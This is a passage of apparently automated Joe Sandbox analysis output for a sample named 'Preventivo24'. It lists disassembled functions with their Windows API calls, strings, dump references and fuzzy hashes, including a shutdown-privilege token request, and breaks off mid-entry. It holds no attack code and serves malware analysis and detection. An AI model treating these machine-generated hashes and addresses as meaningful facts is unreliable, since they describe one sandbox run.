Instruction Fuzzy Hash: E901D43210D31B5EBB7935FC7D86AEA3FB8EB056B0760037AE1F8851D4EF1148919268

Uniqueness

Uniqueness Score: -1.00%

Function 00EB7220 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00EB7314
SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00EB7346
SendMessageW.USER32(?,0000110A,00000004,?), ref: 00EB74C0
SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00EB74E6

Strings

rP, xrefs: 00EB7255, 00EB729D, 00EB72D5, 00EB7383, 00EB751D

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend
String ID: rP
API String ID: 3850602802-4195262923
Opcode ID: c722ad7ce3256f5abe9548597c21b01603912fca43e48f8efe3e48332c84aac2
Instruction ID: a9740e0509402657dd353afa8d8afb1211be8d5593b7872471ce289961f6b2e2
Opcode Fuzzy Hash: c722ad7ce3256f5abe9548597c21b01603912fca43e48f8efe3e48332c84aac2
Instruction Fuzzy Hash: 87A17A72A04214DFCB25DF68D880AEEBBB5FF88314F055169E891BB691DB30ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EBD900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

CreateWindowExW.USER32(?,SysTabControl32,?,46010000,00000000,80000000,00000000,00000000,?,00000309,00000000), ref: 00EBDA1A
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EBDA29
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00EBDA35

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

Strings

TabHost, xrefs: 00EBD98A, 00EBD99C, 00EBD9A6
SysTabControl32, xrefs: 00EBDA12

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$CreateFindHeapProcessResourceWindow
String ID: SysTabControl32$TabHost
API String ID: 2520390496-2872506973
Opcode ID: 49a6a4f220707c94cbf9689b0b010da06e49d897586ad75130ec10b7f2589861
Instruction ID: fa79e4e5fba45b03ff1e4b327050dfd8ba11915edc9eece386a5b9e47f5c43cf
Opcode Fuzzy Hash: 49a6a4f220707c94cbf9689b0b010da06e49d897586ad75130ec10b7f2589861
Instruction Fuzzy Hash: BA61CF35A042149FCB14EF69C885BAEBBF5FF8C320F144169E919AB381DB34AC05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FBEF90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00FBF134
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00FBF150
GetExitCodeProcess.KERNEL32(00000000,010F6BE7), ref: 00FBF161
CloseHandle.KERNEL32(00000000), ref: 00FBF16F

Strings

open, xrefs: 00FBF010

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID: open
API String ID: 2321548817-2758837156
Opcode ID: 8eb69b4a8092626b1601408f9c3958b96f281b7c26829a4087132082c6798f51
Instruction ID: 0ef59c73f0dbf9450fdbf4d3fcaeb368a4f076655dbbd0faf0498883ec6643ff
Opcode Fuzzy Hash: 8eb69b4a8092626b1601408f9c3958b96f281b7c26829a4087132082c6798f51
Instruction Fuzzy Hash: 14716771E00649CBDB14CFA9C8547AEBBB4FF48324F144269E825A73D1EB78A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF63E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(011D0080,B5580983,?), ref: 00FF641F
EnterCriticalSection.KERNEL32(?,B5580983,?), ref: 00FF642C
OutputDebugStringW.KERNEL32(00FD7FF2,?,00000000), ref: 00FF64F5
LeaveCriticalSection.KERNEL32(?,00000000), ref: 00FF6587

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Strings

Logger::SetLogFile( %s ) while OLD path is:%s, xrefs: 00FF6473

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CriticalSection$AllocateDebugEnterHeapInitializeLeaveOutputString
String ID: Logger::SetLogFile( %s ) while OLD path is:%s
API String ID: 117955849-1927537607
Opcode ID: 688652170bd1edefb597211e95a34ae9d0eda76412d596c650a45792e4db9a79
Instruction ID: 1556028b138316297ccace816988595b97179544e56700dd79ed393fe4cab150
Opcode Fuzzy Hash: 688652170bd1edefb597211e95a34ae9d0eda76412d596c650a45792e4db9a79
Instruction Fuzzy Hash: 6A51ED35900208CFCF15DFA8C9557BEBBB1EF49324F184199E925A7392DB35AE02DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4830 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00EC4882
OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 00EC488F
GetLastError.KERNEL32 ref: 00EC48CD
CloseHandle.KERNEL32(00000000), ref: 00EC4904

Strings

SeShutdownPrivilege, xrefs: 00EC489D

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Process$CloseCurrentErrorHandleLastOpenToken
String ID: SeShutdownPrivilege
API String ID: 2767541406-3733053543
Opcode ID: 5fae8bd1e94a23364659337107ff40096607609a9cd72f3519d23ca958afe35f
Instruction ID: e6b080b296375320b35c2fc9ecd198a484e455ce04138f8f191880b865590964
Opcode Fuzzy Hash: 5fae8bd1e94a23364659337107ff40096607609a9cd72f3519d23ca958afe35f
Instruction Fuzzy Hash: DD316D75A41208AFDB28DFA0DA49BEEBBF8FB08714F101169F811B72C0DB759944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00F99580 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 76libraryloaderwindowCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SetWindowTheme), ref: 00F9964D
SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00F99698

Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A

Part of subcall function 00F773D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F77412

Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C

Strings

explorer, xrefs: 00F99678
UxTheme.dll, xrefs: 00F995E1
SetWindowTheme, xrefs: 00F99642

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$AddressConditionDirectoryMessageProcSendSystemVariableWake
String ID: SetWindowTheme$UxTheme.dll$explorer
API String ID: 1065053019-3123591815
Opcode ID: 7d559e0c51ff8651bf73faa3598eb3961fd3ba882b1e572e2e353b1ded305517
Instruction ID: a5b1b2163302565d7154ccf3c965e9707e03eaabd9518780c8295fb0610c1654
Opcode Fuzzy Hash: 7d559e0c51ff8651bf73faa3598eb3961fd3ba882b1e572e2e353b1ded305517
Instruction Fuzzy Hash: 8D21F2B1A46600EBDB38DF28E805B89B7B6F710B21F110339E97167A84D7B56840DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00EA5DF0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 346memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000,?,00000000,B5580983), ref: 00EA5EB6
HeapFree.KERNEL32(00000000,?,00000000,?,00000000,B5580983), ref: 00EA5EBC
GetProcessHeap.KERNEL32(?,00000000), ref: 00EA6055
HeapFree.KERNEL32(00000000,?,00000000), ref: 00EA605B

Strings

#, xrefs: 00EA6185

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: #
API String ID: 3859560861-1885708031
Opcode ID: 66a10ad0e31c269caef944e5ba736f5595514704a6ced2b569766ec4f1c10b10
Instruction ID: 2eaf89841f4293844246efb4ab3e010de6270772317f53c60a2f5f9d0b7cc052
Opcode Fuzzy Hash: 66a10ad0e31c269caef944e5ba736f5595514704a6ced2b569766ec4f1c10b10
Instruction Fuzzy Hash: C6D15571E01209CFDB14CFA8C9947EEBBF0EF5A318F2441AAD8157B291D7756A05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E9EC80 Relevance: 7.8, APIs: 5, Instructions: 306COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(011D001C,B5580983,?,?,?,?,?,?,?,?,?,?,?,?,00000000,010B6085), ref: 00E9ECEA
GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,010B6085), ref: 00E9ED64

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CriticalEnterFileModuleNameSection
String ID:
API String ID: 764724386-0
Opcode ID: b6f667bc287cf11a444b09eb2b2bb6144f6baa2b5ec68dbb3747c7c1b3f56169
Instruction ID: 72a06b8b34aa9d59b03ce4c1776e16ecb3fa904fd4213370e9e6408aeeae87bb
Opcode Fuzzy Hash: b6f667bc287cf11a444b09eb2b2bb6144f6baa2b5ec68dbb3747c7c1b3f56169
Instruction Fuzzy Hash: 44C19D70A04259DFDF25CF68C884BAEBBB9BB08308F144069E915F7391CB75AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E99200 Relevance: 7.6, APIs: 5, Instructions: 132windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00E9925F
GetDlgItem.USER32(?,?), ref: 00E99284
SendMessageW.USER32(?,?,?,?), ref: 00E99358

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ItemMessageSendWindow
String ID:
API String ID: 799199299-0
Opcode ID: 6ef7f8be5107d0301e868ff2137811d3171fe34b97abf1a39ae505e805dabf93
Instruction ID: 0b6b605a7344ed5dd60b8f7bfcd0624f3d091b14db24b5bdbe9d68808ad842c7
Opcode Fuzzy Hash: 6ef7f8be5107d0301e868ff2137811d3171fe34b97abf1a39ae505e805dabf93
Instruction Fuzzy Hash: 3241E232205201AFCB18CF1DE894E76B7A9FB85351F14452EE44AD76A2CB22EC50DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6C50 Relevance: 7.6, APIs: 5, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FB6C84
std::_Lockit::_Lockit.LIBCPMT ref: 00FB6CA6
std::_Lockit::~_Lockit.LIBCPMT ref: 00FB6CCE
std::_Facet_Register.LIBCPMT ref: 00FB6DB7
std::_Lockit::~_Lockit.LIBCPMT ref: 00FB6DEB

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: b2cd733c29c72512afe820f21288ab8edf97a21a526673e508f22daf1c97cf5c
Instruction ID: a2781939a4c827813965c37f5051f6bee27fa931d4e1a85d6eab6988a008348e
Opcode Fuzzy Hash: b2cd733c29c72512afe820f21288ab8edf97a21a526673e508f22daf1c97cf5c
Instruction Fuzzy Hash: B851DF70A05249CFDB15DF58C980BEEBBB0FF10324F24806AD855AB380DB79AA05DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9C10 Relevance: 7.6, APIs: 6, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?), ref: 00FB9C22
LocalFree.KERNEL32(?,?,?), ref: 00FB9C36
GetLastError.KERNEL32 ref: 00FB9C78
LocalAlloc.KERNEL32(00000040,00000014), ref: 00FB9CB8
GetLastError.KERNEL32 ref: 00FB9CD2
LocalFree.KERNEL32(?), ref: 00FB9CE3

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Local$Free$ErrorLast$AllocAllocateHeap
String ID:
API String ID: 1027944315-0
Opcode ID: 466e58d166a50ca2d3fe1e51e81dfaf51735b2395296944286d7ca018dcbe8d5
Instruction ID: 310d023a7543a19677cab61f66b747dd9e703f8da3248909f2f111caf81a316f
Opcode Fuzzy Hash: 466e58d166a50ca2d3fe1e51e81dfaf51735b2395296944286d7ca018dcbe8d5
Instruction Fuzzy Hash: 05314BB1A087029FD7309F6AD948B97BBE8BF44711F00892DFA96D2640E7B4E448DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FFE190 Relevance: 7.6, APIs: 5, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00FFE190,80000000,00000000,00000000,00000003,00000080,00000000,B5580983,?,00FFE190), ref: 00FFE1CC
GetLastError.KERNEL32 ref: 00FFE1EA
ReadFile.KERNEL32(00000000,B5580983,00000004,00FFE190,00000000), ref: 00FFE200
GetLastError.KERNEL32 ref: 00FFE20A
CloseHandle.KERNEL32(00000000), ref: 00FFE229

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID:
API String ID: 3160720760-0
Opcode ID: bded0dbc595cee216e46bb197aefe97a6364923fa763a7b3deaa676adae8bd03
Instruction ID: 19f1f0c39bd3ab7868d5899d9b09a680227877b8642ed97a90c9d1e6cd6b28a5
Opcode Fuzzy Hash: bded0dbc595cee216e46bb197aefe97a6364923fa763a7b3deaa676adae8bd03
Instruction Fuzzy Hash: A8119072A40209AFD734CF54DE05BAABBB8EB05B20F200269FA21F63D0E77459409B91

Uniqueness

Uniqueness Score: -1.00%

Function 00E926C0 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E9270A
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E92710
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00E92733
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,010B3BA6,000000FF), ref: 00E9275B
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,010B3BA6,000000FF), ref: 00E92761

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
